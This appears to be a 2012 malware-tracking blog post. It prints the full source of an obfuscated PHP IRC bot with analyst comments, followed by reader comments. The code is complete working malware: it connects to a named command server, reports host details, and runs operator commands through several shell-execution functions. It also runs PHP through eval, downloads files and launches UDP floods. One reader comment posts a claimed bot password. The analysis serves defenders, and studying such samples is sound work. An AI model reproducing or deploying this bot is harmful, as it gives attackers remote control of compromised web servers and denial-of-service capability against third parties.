gang.sexpil.net (Linux bots hosted in United States, Truckee, Softcom America Inc)

Another bot from Tijn
Resolved : [gang.sexpil.net] To [216.224.184.101]

<?php @set_time_limit(0); @error_reporting(0); class HbZheTqekEkqwtqTQ {

 // ANALYST NOTES (comments added for defenders; the code itself is unchanged).
 //
 // Summary: PHP IRC bot whose identifiers were replaced with random names.
 // The statements on the opening line remove the execution time limit and
 // silence error reporting. The class then connects to the IRC server
 // configured below, joins one channel and acts on commands from an
 // authenticated sender: process execution (passthru, exec, shell_exec,
 // system, popen), PHP eval, fetching a file to disk, a UDP flood, a single
 // TCP port check, DNS lookups and raw IRC lines.
 //
 // Listing caveat: backslash escapes and IRC formatting control bytes appear
 // to have been stripped when the page was rendered ("$msgrn", explode("n"),
 // the "03NN" and "2...2" runs inside messages), and one line in the
 // "download" branch is no longer valid PHP. Treat the message strings as
 // approximate when writing signatures.
 //
 // Host-side traits visible in this code: a PHP process with no time limit
 // holding a long-lived outbound TCP connection to the configured host and
 // port; child processes spawned by the PHP interpreter; short bursts of
 // outbound UDP to random ports in 0-6000.
 // Hardening that blunts what is shown here: outbound filtering on web
 // servers, php.ini disable_functions for the process-execution functions
 // listed above, and allow_url_fopen = Off where remote file() is not needed.

 // Bot configuration. Key names are randomised; the meanings below are taken
 // from how each key is used later in this class:
 //   BbWEWnHeTTwqnNhb  IRC server host passed to fsockopen()
 //   eBwz              IRC server port passed to fsockopen()
 //   ZnQWe             sent as IRC "PASS" when non-empty
 //   KqkktZ            length of the random nickname
 //   KtWqnhZ           channel that is joined and that receives the bot's replies
 //   tZQ               second argument of JOIN (channel key)
 //   NneBweEZz         MD5 string compared with md5() of the "user" command argument
 //   eWNTTTEhbQ        command prefix character
 //   BbzWWQkbNBb       MD5 string compared with md5() of the sender's host part;
 //                     the literal "*" would accept any host
 // The two MD5 strings and the host/port/channel values are fixed strings in
 // this sample and can serve as static-match material for it.
 var $ttwtzTtWQWwhzbN = array("BbWEWnHeTTwqnNhb"=>"gang.sexpil.net",
                     "eBwz"=>"23232",
                     "ZnQWe"=>"scary",
                     "KqkktZ"=>"13",
                     "KtWqnhZ"=>"#wWw#",
                     "tZQ"=>"scan",
                     "NneBweEZz"=>"41aa15390e2efa34ac693c3bd7cb8e88",
                     "eWNTTTEhbQ"=>".",
                     "BbzWWQkbNBb"=>"a87710e60dee7645081a8fc2fab74dbd");
                      // Senders that passed the "user" check, keyed by the full IRC prefix token.
                      var $users = array(); 

 // The random-looking block comments in this class carry no meaning in the
 // code; presumably filler so that copies of the file differ.
 /* txZET4EZRnuKkWrlW8MjP0M46fREwjEPHtjqoOf51zFbmWn9VZiBQVvM0chmmL2T5c9jQffIFLK */
 // Marks $host (the sender's prefix token) as authenticated.
 function yySydpvYj($host) 
 { 
    $this->users[$host] = true; 
 }
 // Low-level send: writes to the IRC socket handle. The string literal looks
 // extraction-damaged (see the listing caveat at the top of the class).
 function SjSpsYm($msg) 
 { 
    fwrite($this->rIiuOioIR,"$msgrn"); 
 }
 // Sends NICK with a random nickname of KqkktZ characters drawn from letters,
 // digits, "_" and "-". $str is appended to without being initialised.
 function aGGAJSAgavgjADGa() {
  $chars = 'abcdefghijklmnopqrstuvwxyz_ABCDEFGHIJKLMNOPQRSTUVWXYZ-0123456789';    
  $size = strlen($chars);
  for($i=0;$i<$this->ttwtzTtWQWwhzbN['KqkktZ'];$i++) {
    $str .= $chars[rand(0,$size-1)];
  }
  $this->SjSpsYm("NICK ".$str."");
 }
 // Sends USER: six random alphanumerics plus "-w" as the user name, and the
 // php_uname() string (or "---" when empty) as the real-name field. The host's
 // OS/kernel string is therefore disclosed to the IRC server at registration.
 function vgdMAdVDmaajYGSap() {
  $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';    
  $size = strlen($chars);
  for($i=0;$i<6;$i++) {
    $str .= $chars[rand(0,$size-1)];
  }
  if(php_uname() == "") { $uname = "---"; } else { $uname = php_uname(); }
  $this->SjSpsYm("USER ".$str."-w 127.0.0.1 localhost :".$uname."");
 }
 // Sends an IRC NOTICE with text $msg to $to.
 function GjSsPVjJda($to,$msg)
 {
    $this->SjSpsYm("NOTICE $to :$msg");
 }
 // Connects to the configured IRC server (30 s timeout) and registers:
 // USER, then PASS when configured, then NICK, then enters the read loop.
 // The first `if` has no braces, so only the recursive retry is conditional;
 // a failed connect retries immediately with no delay.
 function jgVjvJpgavSpa() 
 { 
    if(!($this->rIiuOioIR = fsockopen($this->ttwtzTtWQWwhzbN['BbWEWnHeTTwqnNhb'],$this->ttwtzTtWQWwhzbN['eBwz'],$e,$s,30))) 
    $this->jgVjvJpgavSpa(); 
    $this->vgdMAdVDmaajYGSap();
    if(strlen($this->ttwtzTtWQWwhzbN['ZnQWe'])>0) 
    $this->SjSpsYm("PASS ".$this->ttwtzTtWQWwhzbN['ZnQWe']);
    $this->aGGAJSAgavgjADGa();
    $this->YJpaYmvGmaMGaP();
 }

 /* SxYRjO0KuL56C8ePkQH3LJ3Vq90ZEBzmZo382UJmvEjXDoCN4aHGKAr0ziQ4KggAuazmV8zgDJ4 */
 // UDP flood routine. Builds one payload of $packetsize bytes, then for $time
 // seconds opens a UDP socket to $host on a random port in 0-6000, writes the
 // payload and closes it. Start and finish messages (the latter with MB sent
 // and MB/s) go to the channel. All three arguments come from the operator's
 // message (see the "udpflood" case); nothing here validates them.
 // Seen from the compromised host this is a burst of outbound UDP to one
 // destination across many ports.
 function yAasajsypAaVjaspdd($host,$packetsize,$time) {
    $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[2UdpFlood Started!2]"); 
    $packet = "";
    for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
    $timei = time();
    $i = 0;
    while(time()-$timei < $time) {
        $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
          fwrite($fp,$packet);
           fclose($fp);
        $i++;
    }
    $env = $i * $packetsize;
    $env = $env / 1048576;
    $vel = $env / $time;
    $vel = round($vel);
    $env = round($env);
    $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[2UdpFlood Finished!2]: $env MB enviados / Media: $vel MB/s ");
 }
 // Host report posted to the channel: safe_mode state, the URL the script was
 // requested under ($_SERVER['SERVER_NAME'] + REQUEST_URI), the working
 // directory, an ls-style permission string for that directory, and
 // php_uname(). Everything an operator learns about the host on join comes
 // from this one message. The "03NN" runs are presumably IRC colour codes
 // whose control byte was lost in the listing.
 function PjavvayGYgyayYAypDG() {
    if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "034ON03"; }
    else { $safemode = "039OFF03"; }

    $unme = php_uname();
    if($unme == "") { $mname = "0315---03"; }
    else { $mname = "0315".$unme."03"; }
         
     $url = "0315http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."03";
     $pth = "0315".getcwd()."03";
          
    $pthh =  getcwd()."";
    $perms = fileperms("$pthh");

    // File-type character from the high mode bits.
    if (($perms & 0xC000) == 0xC000) { $info = 's';
    } elseif (($perms & 0xA000) == 0xA000) { $info = 'l';
    } elseif (($perms & 0x8000) == 0x8000) { $info = '-';
    } elseif (($perms & 0x6000) == 0x6000) { $info = 'b';
    } elseif (($perms & 0x4000) == 0x4000) { $info = 'd';
    } elseif (($perms & 0x2000) == 0x2000) { $info = 'c';
    } elseif (($perms & 0x1000) == 0x1000) { $info = 'p';
    } else { $info = 'u'; }

    // Owner
    $info .= (($perms & 0x0100) ? 'r' : '-');
    $info .= (($perms & 0x0080) ? 'w' : '-');
    $info .= (($perms & 0x0040) ?
            (($perms & 0x0800) ? 's' : 'x' ) :
            (($perms & 0x0800) ? 'S' : '-'));
    // Group
    $info .= (($perms & 0x0020) ? 'r' : '-');
    $info .= (($perms & 0x0010) ? 'w' : '-');
    $info .= (($perms & 0x0008) ?
            (($perms & 0x0400) ? 's' : 'x' ) :
            (($perms & 0x0400) ? 'S' : '-'));
    // World
    $info .= (($perms & 0x0004) ? 'r' : '-');
    $info .= (($perms & 0x0002) ? 'w' : '-');
    $info .= (($perms & 0x0001) ?
            (($perms & 0x0200) ? 't' : 'x' ) :
            (($perms & 0x0200) ? 'T' : '-'));
            
    $rghts = "0315".$info."03";

    $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"0314[SAFE:032 $safemode20314]0315 $url 0314[pwd:]0315 $pth 0314(03$rghts0314) [uname:]0315 $mname");
 }
 // Returns 1 when $host is in the authenticated-sender list, else 0.
 function YyajayjSaggv($host) 
 { 
    if(isset($this->users[$host])) 
       return 1; 
    else 
       return 0; 
 }
 // Sends JOIN for $chan with optional key $key.
 function AvYSAY($chan,$key=NULL) 
 { 
    $this->SjSpsYm("JOIN $chan $key"); 
 }
 // Removes $host from the authenticated-sender list.
 function dgdvYYGG($host) 
 { 
    unset($this->users[$host]); 
 }
// Main loop: reads IRC lines, keeps the session alive, and dispatches
// operator commands received as PRIVMSG. When the server closes the
// connection the loop ends and the bot reconnects (last statement).
function YJpaYmvGmaMGaP() 
 { 
    // One line of at most 512 bytes per iteration.
    while(!feof($this->rIiuOioIR)) 
    { 
       $this->buf = trim(fgets($this->rIiuOioIR,512)); 
       $EqqHQNKwKkzHW = explode(" ",$this->buf); 
       // Keep-alive: answer the server's PING.
       if(substr($this->buf,0,6)=="PING :") 
       { 
          $this->SjSpsYm("PONG :".substr($this->buf,6)); 
       } 
       // Numeric 004 (registration accepted): send MODE, join the channel with
       // its key (JOIN is issued twice: directly and through AvYSAY), then post
       // the host report. $this->nick and the '' config key are not defined
       // anywhere in this listing.
       if(isset($EqqHQNKwKkzHW[1]) && $EqqHQNKwKkzHW[1] =="004") 
       { 
          $this->SjSpsYm("MODE ".$this->nick." ".$this->ttwtzTtWQWwhzbN['']); 
          $this->SjSpsYm("JOIN ".$this->ttwtzTtWQWwhzbN['KtWqnhZ']." ".$this->ttwtzTtWQWwhzbN['tZQ']."");
          $this->AvYSAY($this->ttwtzTtWQWwhzbN['KtWqnhZ'],$this->ttwtzTtWQWwhzbN['tZQ']);
          $this->PjavvayGYgyayYAypDG();
       } 
       // Numeric 433 (nickname in use): pick another random nickname.
       if(isset($EqqHQNKwKkzHW[1]) && $EqqHQNKwKkzHW[1]=="433") 
       { 
          $this->aGGAJSAgavgjADGa(); 
       } 
    /* 6XxKRxho7IFY8OF2pL9P5afiVeI2HiWE5keNIl1FTxuRcZKsBJ8xKdFvhenPmajilnWTzOpicK0 */
       // A line identical to the previous one is skipped. $old_buf is only
       // assigned at the end of the loop body.
       if($this->buf != $old_buf) 
       { 
          // Parse the line:
          //   $OOL     text after the first " :" (message body)
          //   $Rrci    message body split on spaces
          //   $XUULo   sender nickname (prefix before "!", leading ":" dropped)
          //   $FUOlRi  sender host (part after "@")
          //   $IFfouOu full prefix token; this is the key used for auth state
          //   $tzNWEQKhTkbNbk  command word followed by its arguments
          $tzNWEQKhTkbNbk = array(); 
          $OOL = substr(strstr($this->buf," :"),2); 
          $Rrci = explode(" ",$OOL); 
          $XUULo = explode("!",$EqqHQNKwKkzHW[0]); 
          $FUOlRi = explode("@",$XUULo[1]); 
          $FUOlRi = $FUOlRi[1]; 
          $XUULo = substr($XUULo[0],1); 
          $IFfouOu = $EqqHQNKwKkzHW[0]; 
          // $this->XUULo is never assigned in this listing; the first branch
          // would drop the leading word, the second copies the words as they are.
          if($Rrci[0]==$this->XUULo) 
          { 
           for($i=0;$i<count($Rrci);$i++) 
              $tzNWEQKhTkbNbk[$i] = $Rrci[$i+1]; 
          } 
          else 
          { 
           for($i=0;$i<count($Rrci);$i++) 
              $tzNWEQKhTkbNbk[$i] = $Rrci[$i]; 
          } 
          if(count($EqqHQNKwKkzHW)>2) 
          { 
             switch($EqqHQNKwKkzHW[1]) 
             { 
                // Sender quit or left: drop its authenticated state.
                case "QUIT": 
                   if($this->YyajayjSaggv($IFfouOu)) 
                   { 
                      $this->dgdvYYGG($IFfouOu); 
                   } 
                break; 
                case "PART": 
                   if($this->YyajayjSaggv($IFfouOu)) 
                   { 
                      $this->dgdvYYGG($IFfouOu); 
                   } 
                break; 
                case "PRIVMSG": 
                   // Sender not yet authenticated: only the "user" command is
                   // accepted, and only when md5(sender host) equals
                   // BbzWWQkbNBb (or that value is "*"). A matching password
                   // hash authenticates the sender; otherwise a NOTICE with a
                   // Dutch "wrong password" message goes to the channel.
                   if(!$this->YyajayjSaggv($IFfouOu) && (md5($FUOlRi) == $this->ttwtzTtWQWwhzbN['BbzWWQkbNBb'] || $this->ttwtzTtWQWwhzbN['BbzWWQkbNBb'] == "*")) 
                   { 
                      if(substr($tzNWEQKhTkbNbk[0],0,1)==$this->ttwtzTtWQWwhzbN['eWNTTTEhbQ']) 
                      { 
                         switch(substr($tzNWEQKhTkbNbk[0],1)) 
                         { 
                            case "user": 
                              if(md5($tzNWEQKhTkbNbk[1])==$this->ttwtzTtWQWwhzbN['NneBweEZz']) 
                              { 
                                 $this->yySydpvYj($IFfouOu);
                              } 
                              else 
                              { 
                                 $this->GjSsPVjJda($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[2Auth2]: Foute password $XUULo idioot!!");
                              } 
                            break; 
                         } 
                      } 
                   } 
             /* ezBw1buoLyT6FYkkaltjwH5g6JvfL56QvxdmyyA9Wk6s9hC9sWjPueVqOgwqcs6xQaKfyaeklbC */
                   // Authenticated sender: full command set. Every branch
                   // below acts on text taken straight from the IRC message.
                   elseif($this->YyajayjSaggv($IFfouOu)) 
                   { 
                      if(substr($tzNWEQKhTkbNbk[0],0,1)==$this->ttwtzTtWQWwhzbN['eWNTTTEhbQ']) 
                      { 
                         switch(substr($tzNWEQKhTkbNbk[0],1)) 
                         {
                            // Process execution via passthru(); $command is
                            // everything after the command word.
                            case "passthru": 
                               $command = substr(strstr($OOL,$tzNWEQKhTkbNbk[0]),strlen($tzNWEQKhTkbNbk[0])+1); 

                               $exec = passthru($command); 
                               $ret = explode("n",$exec); 
                               for($i=0;$i<count($ret);$i++) 
                                  if($ret[$i]!=NULL) 
                                     $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"      : ".trim($ret[$i])); 
                break;
                            // Sends QUIT, closes the socket and ends the script.
                            case "die": 
                               $this->SjSpsYm("QUIT :die command from $XUULo");
                               fclose($this->rIiuOioIR); 
                               exit;
                            // Hands three operator-supplied arguments to the
                            // UDP flood routine without validation.
                            case "udpflood": 
                               if(count($tzNWEQKhTkbNbk)>3) 
                               { 
                                  $this->yAasajsypAaVjaspdd($tzNWEQKhTkbNbk[1],$tzNWEQKhTkbNbk[2],$tzNWEQKhTkbNbk[3]); 
                               } 
                break;
                            // Single TCP connect (15 s timeout) to the given
                            // host and port; reports open or closed.
                            case "pscan": 
                               if(count($tzNWEQKhTkbNbk) > 2) 
                               { 
                                  if(fsockopen($tzNWEQKhTkbNbk[1],$tzNWEQKhTkbNbk[2],$e,$s,15)) 
                                     $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[2pscan2]: ".$tzNWEQKhTkbNbk[1].":".$tzNWEQKhTkbNbk[2]." is 2open2"); 
                                  else 
                                     $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[2pscan2]: ".$tzNWEQKhTkbNbk[1].":".$tzNWEQKhTkbNbk[2]." is 2closed2"); 
                               } 
                break;
                            // Re-posts the host report.
                            case "info":
                   $this->PjavvayGYgyayYAypDG();
                break;
                            // Process execution via exec().
                            case "exec": 
                               $command = substr(strstr($OOL,$tzNWEQKhTkbNbk[0]),strlen($tzNWEQKhTkbNbk[0])+1); 
                               $exec = exec($command); 
                               $ret = explode("n",$exec); 
                               for($i=0;$i<count($ret);$i++) 
                                  if($ret[$i]!=NULL) 
                                     $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"      : ".trim($ret[$i])); 
                break;
                            // Drops the sender's authenticated state and
                            // confirms in the channel (Dutch message).
                            case "logout": 
                               $this->dgdvYYGG($IFfouOu); 
                               $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[auth:]0314 Je bent nu uitgelogt $XUULo"); 
                break;
                            // Reverse lookup for a dotted numeric argument,
                            // forward lookup otherwise; result goes to the channel.
                            case "dns": 
                               if(isset($tzNWEQKhTkbNbk[1])) 
                               { 
                                  $ip = explode(".",$tzNWEQKhTkbNbk[1]); 
                                  if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) 
                                  { 
                                     $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[2dns2]: ".$tzNWEQKhTkbNbk[1]." => ".gethostbyaddr($tzNWEQKhTkbNbk[1])); 
                                  } 
                                  else 
                                  { 
                                     $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[2dns2]: ".$tzNWEQKhTkbNbk[1]." => ".gethostbyname($tzNWEQKhTkbNbk[1])); 
                                  } 
                               } 
                break;
                            // Sends QUIT, closes the socket and reconnects from
                            // inside this loop (a nested call to the connect routine).
                            case "restart": 
                               $this->SjSpsYm("QUIT :gerestart door $XUULo");
                               fclose($this->rIiuOioIR); 
                               $this->jgVjvJpgavSpa(); 
                break;
                            // File drop: argument 2 is opened for writing
                            // locally, argument 1 is read with file() and
                            // copied into it line by line. When argument 1 is
                            // a URL this depends on allow_url_fopen. On a
                            // compromised host, look for files newly written
                            // by the web server user.
                            case "download": 
                               if(count($tzNWEQKhTkbNbk) > 2) 
                               { 
                                  if(!$fp = fopen($tzNWEQKhTkbNbk[2],"w")) 
                                  {  
                                     $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[download:]0314 Kon bestand niet downloaden. Toestemming geweigerd."); 
                                  } 
                                  else 
                                  { 
                                     if(!$get = file($tzNWEQKhTkbNbk[1])) 
                                     { 
                                        $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[download:]0314 Kan bestand 2".$tzNWEQKhTkbNbk[1]."2 niet downloaden."); 
                                     } 
                                     else 
                                     { 
                                        for($i=0;$i<=count($get);$i++) 
                                        { 
                                           fwrite($fp,$get[$i]); 
                                        } 
                                        $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[download:]0314 Bestand 2".$tzNWEQKhTkbNbk[1]."2 gedownload naar 2".$tzNWEQKhTkbNbk[2]."2"); 
                                     } 
                                     fclose($fp); 
                                  } 
                               }
                               // Usage hint branch. As listed, the next line has
                               // lost its escaped quotes and does not parse.
                               else { $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[download:]0314 Typ ".download http://your.host/file /tmp/file""); }
                break;
                            // Process execution via shell_exec().
                            case "sexec":
                               $command = substr(strstr($OOL,$tzNWEQKhTkbNbk[0]),strlen($tzNWEQKhTkbNbk[0])+1); 
                               $exec = shell_exec($command); 
                               $ret = explode("n",$exec); 
                               for($i=0;$i<count($ret);$i++) 
                                  if($ret[$i]!=NULL) 
                                     $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"      : ".trim($ret[$i])); 
                break;
                            // Runs operator-supplied text as PHP inside this
                            // process; disable_functions does not cover eval,
                            // since it is a language construct.
                            case "eval":
                              $eval = eval(substr(strstr($OOL,$tzNWEQKhTkbNbk[1]),strlen($tzNWEQKhTkbNbk[1])));
                break;
                            // Forwards operator-supplied text to the IRC
                            // server as a raw line.
                            case "raw":
                               $this->SjSpsYm(strstr($OOL,$tzNWEQKhTkbNbk[1])); 
                break;
                            // Process execution via system().
                            case "system": 
                               $command = substr(strstr($OOL,$tzNWEQKhTkbNbk[0]),strlen($tzNWEQKhTkbNbk[0])+1); 
                               $exec = system($command); 
                               $ret = explode("n",$exec); 
                               for($i=0;$i<count($ret);$i++) 
                                  if($ret[$i]!=NULL) 
                                     $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"      : ".trim($ret[$i])); 
                break;
                            // Switches to a new random nickname.
                            case "rndnick": 
                               $this->aGGAJSAgavgjADGa(); 
                break;
                            // Process execution via popen(); the command is
                            // echoed to the channel, then output is relayed in
                            // reads of up to 512 bytes.
                            case "popen": 
                               if(isset($tzNWEQKhTkbNbk[1])) 
                               { 
                                  $command = substr(strstr($OOL,$tzNWEQKhTkbNbk[0]),strlen($tzNWEQKhTkbNbk[0])+1); 
                                  $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[2popen2]: $command");
                                  $pipe = popen($command,"r"); 
                                  while(!feof($pipe)) 
                                  { 
                                     $pbuf = trim(fgets($pipe,512)); 
                                     if($pbuf != NULL) 
                                        $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"     : $pbuf"); 
                                  } 
                                  pclose($pipe); 
                               }  
                break;
                         } 
                      } 
                   } 
                break; 
             } 
          } 
       } 
       $old_buf = $this->buf; 
    } 
    // Connection ended: reconnect at once. Connect and read loop call each
    // other, so the script never returns on its own.
    $this->jgVjvJpgavSpa(); 
 }
 // Sends an IRC PRIVMSG with text $msg to $to; used for all channel replies.
 function mvppvYGyYVS($to,$msg)
 {
    $this->SjSpsYm("PRIVMSG $to :$msg");
 }
}
// Entry point: the bot is instantiated and connects as soon as the file is
// executed, so a single request for (or include of) the file is enough to
// start it.
$lcuXcFOO = new HbZheTqekEkqwtqTQ;
$lcuXcFOO->jgVjvJpgavSpa(); ?>

Hosting info:
http://whois.domaintools.com/216.224.184.101


9 Comments

makaveli - May 11, 2012 at 2:06 pm

Heyy what can we do with this ? just warning about site web ?

Pig - May 11, 2012 at 5:28 pm

all u can do is learning something if u feel ready for it

Anonymous - May 12, 2012 at 1:07 am

I've gotten several copies of this bot on my honeypot. When I saw it, I laughed since they tried obfuscating the code but basically just changed the damn functions name.

REAL SECURE DAWGS!

Btw, they use some super duper hax0r3d ircd with barely any info provided to non-admin users.

makaveli - May 12, 2012 at 9:23 am

@pig thank's mate, but it is php code right ? what do this code ?

Pig - May 12, 2012 at 3:21 pm

makaveli u can do portscan, ddos, download files and much more
just read the source

Anonymous - May 12, 2012 at 7:41 pm

It's just like any other version of pbot. The function names have just been renamed.

Pig - May 12, 2012 at 8:33 pm

this is more advanced from same guy

http://hpaste.org/68434

1x33x7 - June 15, 2012 at 7:41 am

HeHe,
the password for the pbots is "p0w3r" without the ""
much fun 🙂

MFG
1x33x7

1x33x7 - June 15, 2012 at 7:43 am

pass is p0w3r for the pbots 😀
